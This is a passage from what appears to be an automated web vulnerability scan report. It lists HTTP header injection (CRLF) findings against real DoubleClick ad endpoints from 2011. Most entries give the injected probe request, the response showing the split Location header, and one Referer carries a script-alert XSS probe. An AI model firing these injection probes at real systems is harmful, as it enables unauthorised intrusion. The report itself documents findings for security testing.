The value of REST URL parameter 1 is copied into the Location response header. The payload 6b858%0d%0a3e3badc21b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b858%0d%0a3e3badc21b0/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b858
3e3badc21b0
/N3285.google/B2343920.135;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 18:54:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.17. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 189f2%0d%0afcaa5df54c2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /189f2%0d%0afcaa5df54c2/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=920452258? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/189f2
fcaa5df54c2
/N553.158901.DATAXU/B4970757.4%3Bsz%3D728x90%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D920452258:
Date: Thu, 03 Feb 2011 16:04:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.18. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3f5bf%0d%0ae563ac11b96 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3f5bf%0d%0ae563ac11b96/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3f5bf
e563ac11b96
/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 16:05:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.19. http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/ocr.sant.ocregister/homepage

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 71e0e%0d%0ae9a1d806e67 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /71e0e%0d%0ae9a1d806e67/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/71e0e
e9a1d806e67
/ocr.sant.ocregister/homepage%3Bs1%3Dhomepage%3Bpos%3D1%3Bdcode%3Docr%3Bpcode%3Dsant%3Bkw%3D%3Bref%3D:
Date: Thu, 03 Feb 2011 18:53:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.20. http://ad.doubleclick.net/adj/N3285.google/B2343920.135 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3285.google/B2343920.135

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 57a59%0d%0a2e93fa0572a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /57a59%0d%0a2e93fa0572a/N3285.google/B2343920.135;abr=!ie;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/57a59
2e93fa0572a
/N3285.google/B2343920.135;abr=!ie;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 19:04:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.21. http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.158901.DATAXU/B4970757.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1e148%0d%0afd24d678fa4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1e148%0d%0afd24d678fa4/N553.158901.DATAXU/B4970757.4 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1e148
fd24d678fa4
/N553.158901.DATAXU/B4970757.4:
Date: Thu, 03 Feb 2011 16:09:02 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5164c%0d%0a54d8039e672 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5164c%0d%0a54d8039e672/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5164c
54d8039e672
/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 16:07:00 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8eb0e%0d%0a1a688a7e3f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8eb0e%0d%0a1a688a7e3f5/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8eb0e
1a688a7e3f5
/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 16:09:08 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4e029%0d%0a8d39dccd6e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4e029%0d%0a8d39dccd6e9/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4e029
8d39dccd6e9
/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 16:07:29 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.25. http://ad.doubleclick.net/adj/accuwx.us.radarandmaps/satellite [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/accuwx.us.radarandmaps/satellite

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 42370%0d%0ad7fc4ebae71 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /42370%0d%0ad7fc4ebae71/accuwx.us.radarandmaps/satellite;qcs=3834;qcs=3833;qcs=3830;qcs=3828;qcs=3825;qcs=3824;qcs=3823;qcs=3821;qcs=3806;qcs=3701;qcs=3700;qcs=2639;qcs=2620;qcs=2619;qcs=1974;pos=top;sz=980x30,728x90;tile=1;ord=372440784703940160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.accuweather.com/us/satellite/ei/us_/satellite.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/42370
d7fc4ebae71
/accuwx.us.radarandmaps/satellite%3Bqcs%3D3834%3Bqcs%3D3833%3Bqcs%3D3830%3Bqcs%3D3828%3Bqcs%3D3825%3Bqcs%3D3824%3Bqcs%3D3823%3Bqcs%3D3821%3Bqcs%3D3806%3Bqcs%3D3701%3Bqcs%3D3700%3Bqcs%3D2639%3Bqcs%3D2620%3Bqcs%3D2619%3Bqcs%3D1974%3Bpos%3Dtop%3Bsz%3D980x30%2C728x90%3Btile%3D1%3Bord%3D372440784703940160:
Date: Thu, 03 Feb 2011 18:53:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.26. http://ad.doubleclick.net/adj/locm.pp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/locm.pp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4f6f6%0d%0af510117f0b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4f6f6%0d%0af510117f0b4/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4f6f6
f510117f0b4
/locm.pp%3Bdcopt%3Dist%3Bkw%3Dbanks%3Bpos%3D%3Btile%3D%3Bcity%3Ddallas_tx%3Bsz%3D350x300%3Bord%3D1296748882748:
Date: Thu, 03 Feb 2011 16:03:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.27. http://ad.doubleclick.net/adj/locm.sp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/locm.sp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3fae6%0d%0a7ebdf66e13 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3fae6%0d%0a7ebdf66e13/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748812638? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&sz=170x150&ord=1296748812638&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3fae6
7ebdf66e13
/locm.sp%3Bdcopt%3Dist%3Bkw%3Dbanks%3Bpos%3D%3Btile%3D%3Bcity%3Ddallas_tx%3Bsz%3D170x150%3Bord%3D1296748812638:
Date: Thu, 03 Feb 2011 16:08:40 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.28. http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/locm.sp/retail_banks_15020100

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4b813%0d%0a38c9ae3db10 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4b813%0d%0a38c9ae3db10/locm.sp/retail_banks_15020100 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4b813
38c9ae3db10
/locm.sp/retail_banks_15020100:
Date: Thu, 03 Feb 2011 16:08:48 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.29. http://ad.doubleclick.net/adj/ocr.sant.ocregister/homepage [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ocr.sant.ocregister/homepage

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7157e%0d%0a28bf7eec74 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7157e%0d%0a28bf7eec74/ocr.sant.ocregister/homepage HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7157e
28bf7eec74
/ocr.sant.ocregister/homepage:
Date: Thu, 03 Feb 2011 19:03:57 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.30. http://ad.doubleclick.net/jump/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N3867.605.ACCUWEATHER/B5097428.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7839e%0d%0a13e7a69b9b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7839e%0d%0a13e7a69b9b/N3867.605.ACCUWEATHER/B5097428.13;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7839e
13e7a69b9b
/N3867.605.ACCUWEATHER/B5097428.13%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:50 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.31. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 65bdc%0d%0a9a784ec95fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /65bdc%0d%0a9a784ec95fb/N884.AccuWeather/B4902356.13 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/65bdc
9a784ec95fb
/N884.AccuWeather/B4902356.13:
Date: Thu, 03 Feb 2011 19:03:40 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.32. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.14 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.14

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8f012%0d%0aa7185e3a5c9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8f012%0d%0aa7185e3a5c9/N884.AccuWeather/B4902356.14;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8f012
a7185e3a5c9
/N884.AccuWeather/B4902356.14%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:37 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.33. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24bce%0d%0a68ef865ea3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24bce%0d%0a68ef865ea3b/N884.AccuWeather/B4902356.6;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
